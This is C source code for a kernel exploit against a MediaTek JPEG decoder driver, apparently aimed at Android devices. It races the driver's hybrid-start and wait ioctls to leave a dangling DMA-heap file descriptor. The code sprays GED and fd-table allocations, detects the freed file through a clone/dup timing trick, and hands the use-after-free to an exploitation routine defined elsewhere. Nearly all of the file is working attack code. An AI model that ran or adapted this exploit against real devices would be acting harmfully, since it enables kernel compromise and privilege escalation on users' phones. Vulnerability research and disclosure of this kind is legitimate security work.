//#define ION
#define _GNU_SOURCE
#include <sched.h>
#include <sys/time.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include<sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <linux/dma-heap.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <stdbool.h>
#include <sys/syscall.h>
#include <string.h>
#include "functions.h"

#ifdef ION
#include "ion.h"
#endif
#define ION_BIT(nr) (1UL << (nr))
void sync_rcu();
#define ION_HEAP(bit)			ION_BIT(bit)
#define NUM_PROCESS 256
struct JPEG_DEC_DRV_HYBRID_TASK {
	long timeout;
	int *hwid;
	int *index_buf_fd;
	unsigned int data[21];
};

struct JPEG_DEC_DRV_HYBRID_P_N_S {
	int hwid;
	int *progress_n_status;
};

static struct timeval start;
static inline void timer_start() {
    gettimeofday(&start, NULL);
}
static inline unsigned long timer_stop() {
    struct timeval stop;
    gettimeofday(&stop,NULL);
    return (stop.tv_sec - start.tv_sec) * 1000000 + stop.tv_usec - start.tv_usec;
}
#define JPEG_IOCTL_MAGIC        'x'

#define JPEG_DEC_IOCTL_HYBRID_START _IOWR(JPEG_IOCTL_MAGIC, 18, struct JPEG_DEC_DRV_HYBRID_TASK)
#define JPEG_DEC_IOCTL_HYBRID_WAIT _IOWR(JPEG_IOCTL_MAGIC, 19, struct JPEG_DEC_DRV_HYBRID_P_N_S)
#define JPEG_DEC_IOCTL_HYBRID_GET_PROGRESS_STATUS _IOWR(JPEG_IOCTL_MAGIC, 20, struct JPEG_DEC_DRV_HYBRID_P_N_S)
void exploit_dangling_fd(int fd, int freeme);
bool addr_faulted(void* addr)
{
    char c;
    mincore(addr,1,&c);
    return c;
}
long clone_syscall(unsigned long flags, void *stack,
                      int *parent_tid, int *child_tid,
                      unsigned long tls)
{
    return syscall(SYS_clone,flags,stack,parent_tid,child_tid,tls);
}

bool is_freed(int fd) {
    sleep(1);
    pid_t p;
    int wstatus;
    if(!(p = clone_syscall(CLONE_FILES,NULL,NULL,NULL,0)))
    {
        puts("dup'ing");
        close(dup(fd));
        puts("Exit");
        exit(0);
    }
    if(p == -1) {
        printf("Failed to clone: %m\n");
        exit(0);
    }
    struct timeval tv,tv_current;
    gettimeofday(&tv,NULL);
    do
    {
        gettimeofday(&tv_current,NULL);
        if(waitpid(p,&wstatus,WNOHANG | WEXITED) == p)
        {
            //The process did not freeze, so the fd is not freed
            puts("was not freed");
            sleep(1);
            return false;
        }
    } while(tv_current.tv_sec <= tv.tv_sec + 1);
    puts("was freed!!");
    //The process is frozen, so the fd is freed. unfreeze and return true
    dup2(fd,0x100);
    waitpid(p,&wstatus,0);
    return true;


}
void set_cpu(int cpu){
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu,&set);
    if(sched_setaffinity(0,sizeof(set),&set) == -1)
        printf("cpu setting %d failed %m\n",cpu);
}
void unset_cpu()
{
    cpu_set_t set;
    CPU_ZERO(&set);
    for(unsigned i = 0; i < 8; i++)
        CPU_SET(i,&set);
    sched_setaffinity(0,sizeof(set),&set);
}
void test_stub();
int main(int argc, char* argv[]) {
    pidfd = syscall(SYS_pidfd_open,getpid(),0);
    if(pidfd == -1) {
        printf("pidfd open failed!\n");
    }
    //We need this guy to create GEEntry fds.
    //Allocate it before freeing to leave a dangling fd
    ged_fd = open("/proc/ged",O_RDONLY);
    if(ged_fd == -1) {
        printf("open ged: %m\n");
        exit(0);
    }
    printf("allocating ge fds\n");
    final_reclaim_ge_fd = ge_alloc(ged_fd,256);
    set_cpu(2);
    for(unsigned i = 0; i < GE_SPRAY_SIZE; i++)
        other_ge_fds[i] = ge_alloc(ged_fd,512);
    unset_cpu();
    // test_stub();
    int ret;
    struct JPEG_DEC_DRV_HYBRID_TASK start = { 0 };
    int jpegfd = open("/proc/mtk_jpeg",O_RDONLY);
    if(jpegfd == -1) {
        printf("open: %m\n");
        return 1;
    }
    start.timeout = 3000;
    ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);

    #ifdef ION
    int dmafd = open("/dev/ion",O_RDONLY);
    struct ion_allocation_data ion_alloc_data;
    ion_alloc_data.len = 128;
	ion_alloc_data.flags = 1;
	ion_alloc_data.heap_id_mask = 1 << 0;
    ion_alloc_data.align = 4;
    if(ioctl(dmafd,ION_IOC_ALLOC,&ion_alloc_data) < 0)
    {
        printf("ion alloc: %m\n");
        exit(1);
    }
    struct ion_fd_data heap_data;
    heap_data.handle = ion_alloc_data.handle;
    if(ioctl(dmafd,ION_IOC_SHARE,&heap_data) < 0)
    {
        printf("ion share: %m\n");
        exit(1);
    }
    #else
    int dmafd = open("/dev/dma_heap/system",O_RDONLY);
    if(dmafd == -1) {
        printf("dma open: %m\n");
        return 1;
    }
    struct dma_heap_allocation_data heap_data = {
        .len = 4096,
        .fd_flags = O_RDWR,
    };

    set_cpu(2);
    unsigned fdtable_spray_size = 32;
    for(unsigned i = 0; i < fdtable_spray_size; i++) {
        void* stack = mmap(NULL,0x1000 * 10,PROT_READ | PROT_WRITE,MAP_PRIVATE | MAP_ANONYMOUS,0,0);
        clone(clone_func,stack + 0x1000 * 10,CLONE_FILES | CLONE_VM, NULL);
    }
    ret = ioctl(dmafd,DMA_HEAP_IOCTL_ALLOC,&heap_data);
    if( ret < 0 || heap_data.fd < 0)
    {
        printf("dma heap allocation fail: %d %d %m\n",ret,heap_data.fd);
        exit(1);
    }
    unset_cpu();
    #endif
    close(dmafd);

    puts("Successful opens");
    start.timeout = 3000;
    int hwid = 41414141,index_buf_fd;
    start.hwid = &hwid;
    start.index_buf_fd = &index_buf_fd;
    start.data[20] = 0;
    start.data[7] = heap_data.fd;
    int* shared_map = mmap(NULL,0x2000, PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
    while(1) {
        puts("TRY");
        struct JPEG_DEC_DRV_HYBRID_P_N_S pns;
        pns.progress_n_status = shared_map;
        pns.hwid = 0;
        pid_t child;
        struct timeval tv,tv_current;
        gettimeofday(&tv,NULL);
        if(!(child = fork()))
        {
            //Child
            set_cpu(0);
            close(heap_data.fd);
            shared_map[0x1000 >> 2] = 1;
            while(shared_map[0x1000 >> 2] != 2);
            ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_WAIT,&pns);
            exit(0);
        }
        //set_cpu(1);
        while(!shared_map[0x1000 >> 2]);
        shared_map[0x1000 >> 2] = 2;
        ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start);
        if(ret == 0)
        {
            printf("hybrid start unexpected success\n");
            return 1;
        }
        printf("child id: %d\n",child);
        bool missed_race = false;
        int wstatus;
        do {
            gettimeofday(&tv_current,NULL);
            switch(waitpid(child,&wstatus,WNOHANG)) {
                case 0:
                //Child exists, but it's unclear if it's exiting. Finish and allow timeout if necessary
                break;
                case -1:
                printf("waitpid: %m\n");
                return 1;
                default:
                //Child returned so we missed the initial dec_hwlocked race. Try again
                munmap(shared_map,0x2000);
                shared_map = mmap(NULL,0x2000, PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
                puts("Missed initial race");
                missed_race = true;
                sleep(1);

            }
        } while(tv_current.tv_sec <= tv.tv_sec + 1 && !missed_race);
        if(missed_race)
            continue;
        puts("Hit initial race, waiting...");
        //At least one second has elapsed, so we know we won the first race. Now we wait for the page fault then try again
        //sleep(1);
        struct JPEG_DEC_DRV_HYBRID_TASK start2 = { 0 };
        start2.timeout = 3000;
        //I make this allocation succeed to increase the race window for i_dbuf
        //to be spuriously decremented. It will go away anyway from one of the unlocks
        start2.data[20] = 0x20000000;
        //Make this crazy because it doesn't matter now really
        start2.data[7] = 0x4141;
        // set_cpu(0);
        while(!addr_faulted(shared_map));
        ret = ioctl(jpegfd,JPEG_DEC_IOCTL_HYBRID_START,&start2);
        if(ret == 0)
        {
            printf("hybrid start unexpected success\n");
            return 1;
        }
        ret = waitpid(child,&wstatus,WNOHANG);
        printf("waitpid output: %d\n",ret);
        if(ret == 0)
            waitpid(child,&wstatus,0);
        
        sync_rcu();
        int stable_fd = stabilize_fd(heap_data.fd);
       
        if(parse_fdinfo_count(heap_data.fd) == 1) {
            printf("We did the UAF!\n");
            exploit_dangling_fd(heap_data.fd,-1);
        }
        close(stable_fd);
        unset_cpu();
        munmap(shared_map,0x2000);
        shared_map = mmap(NULL,0x2000, PROT_READ | PROT_WRITE,MAP_SHARED | MAP_ANONYMOUS,0,0);
    }
    exit(0);
}
